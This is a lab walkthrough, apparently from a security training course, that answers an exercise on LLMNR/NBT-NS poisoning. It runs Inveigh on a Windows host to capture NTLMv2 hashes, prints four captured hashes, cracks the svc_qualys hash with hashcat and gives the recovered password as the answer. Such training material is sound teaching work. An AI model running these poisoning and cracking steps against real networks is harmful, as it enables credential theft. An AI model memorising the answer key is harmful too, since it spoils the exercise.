LLMNR/NBT-NS Poisoning - from Windows
❓Question
Run Inveigh and capture the NTLMv2 hash for the svc_qualys account. Crack and submit the cleartext password as the answer.
📋 Walkthrough
We log in via RDP, import the Inveigh.ps1 module located in the C:\Tools directory, and start it. Remember to run powershell as an administrator.
| PS C:\Tools> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2025-03-30T12:48:36 | PID 4216]
[+] Packet Sniffer Addresses [IP 172.16.5.25 | IPv6 fe80::10e9:773c:4d60:b530%8]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.5.25 | IPv6 fe80::10e9:773c:4d60:b530%8]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Tools]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
|
After letting it run for a while, by pressing esc we can enter interactive mode and retrieve the hashes using the GET NTLMV2UNIQUE command.
| ================================================= Unique NTLMv2 Hashes =================================================
Hashes
========================================================================================================================
lab_adm::INLANEFREIGHT:2F554D7645992E1E:BCAD2D49D98380A1877E12430880D37E:0101000000000000415CDDC1ACA1DB01A57AFC979BAD62190000000002001A0049004E004C0041004E004500460052004500490047004800540001001E00410043004100440045004D0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800415CDDC1ACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900280063006900660073002F00610063006100640065006D0079002D00650061002D0077006500620030000000000000000000
backupagent::INLANEFREIGHT:56B889F40D8D4587:F84F125069322417E4D138C3D7354116:010100000000000073F3B3CAACA1DB01B87032EB742BAB0A0000000002001A0049004E004C0041004E004500460052004500490047004800540001001E00410043004100440045004D0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000700080073F3B3CAACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0035002E00320035000000000000000000
svc_qualys::INLANEFREIGHT:053BD75E82885D85:5804D6E32161FB502A9872CF3F741321:0101000000000000D58E3BCEACA1DB01F90DC91AE161A9BF0000000002001A0049004E004C0041004E004500460052004500490047004800540001001E00410043004100440045004D0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800D58E3BCEACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0035002E00320035000000000000000000
forend::INLANEFREIGHT:D873088970A7BEF4:726D9632EC67028414FC5D9C500521AD:0101000000000000FD70F6D5ACA1DB01F5C2F7F2FD9C12CB0000000002001A0049004E004C0041004E004500460052004500490047004800540001001E00410043004100440045004D0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800FD70F6D5ACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0035002E00320035000000000000000000
|
Now we can crack the password using hashcat.
| ──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...existing output...
SVC_QUALYS::INLANEFREIGHT:053bd75e82885d85:5804d6e32161fb502a9872cf3f741321:0101000000000000d58e3bceaca1db01f90dc91ae161a9bf0000000002001a0049004e004c0041004e004500460052004500490047004800540001001e00410043004100440045004d0059002D00450041002D004D005300300031000400260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0003004600410043004100440045004D0059002D00450041002D004D005300300031002E0049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C000500260049004E004C0041004E00450046005200450049004700480054002E004C004F00430041004C0007000800D58E3BCEACA1DB0106000400020000000800300030000000000000000000000000300000C9FA807377F66C4994EB4116071C6456E287BD34BBA0D8FDBD67D025208998F10A001000000000000000000000000000000000000900200063006900660073002F003100370032002E00310036002E0035002E00320035000000000000000000:security#1
...existing output...
|
Answer
security#1